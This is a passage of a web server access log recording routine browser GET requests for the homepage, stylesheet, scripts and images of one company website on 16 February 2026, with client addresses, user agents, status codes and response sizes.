192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:30:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:30:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:30:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 18942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:30:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:30:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:30:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:37:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:37:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:37:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:37:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18970] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:37:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:37:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:37:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:41:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:41:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:41:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:41:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:41:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:41:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:41:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:41:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:41:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:41:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:41:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:42:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:42:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:42:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:42:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:42:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:42:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:42:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:42:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:42:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:42:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:42:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:44:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:44:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:44:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:44:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:44:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:44:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:44:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:44:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19049] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:44:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:44:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:44:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:53:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:53:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:53:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:53:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:53:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:53:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:53:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:53:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19071] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:53:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:53:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:53:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:54:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:54:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:54:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:54:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:54:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:54:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:54:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:54:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 19065] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:54:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:54:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:54:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:00:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:21:00:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:00:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:00:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:00:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:21:00:42 